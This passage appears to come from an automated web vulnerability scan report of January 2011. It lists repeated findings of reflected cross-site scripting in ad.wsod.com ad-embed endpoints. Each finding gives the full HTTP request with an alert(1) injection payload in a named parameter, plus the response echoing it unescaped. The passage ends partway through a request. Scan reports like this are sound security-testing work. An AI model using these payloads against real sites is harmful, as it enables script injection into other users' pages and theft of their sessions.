5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98da'-alert(1)-'8363eeee3cc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296398960:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4e4'-alert(1)-'5a9940a3aa6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296398946:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 927

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85db5'-alert(1)-'daab0c4241f was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399023:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdd79'-alert(1)-'0f43dad1fc1 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:41 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399041:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35aab'-alert(1)-'33a2db030cc was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:38345:1296399033:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cf7'-alert(1)-'528bcea4702 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399014:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a704d'-alert(1)-'e0d47f974c4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:49 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296398989:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 921

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a1b'-alert(1)-'677433aee2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:33 GMT; path=/
Set-Cookie: i_1=33:1411:793:100:0:38345:1296399093:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:51:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 920

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fba"-alert(1)-"faae54f86dc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=801523511fba"-alert(1)-"faae54f86dc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398960**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=801523511fba"-alert(1)-"faae54f86dc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f424"-alert(1)-"73f0b6789de was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=17989824732f424"-alert(1)-"73f0b6789de&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
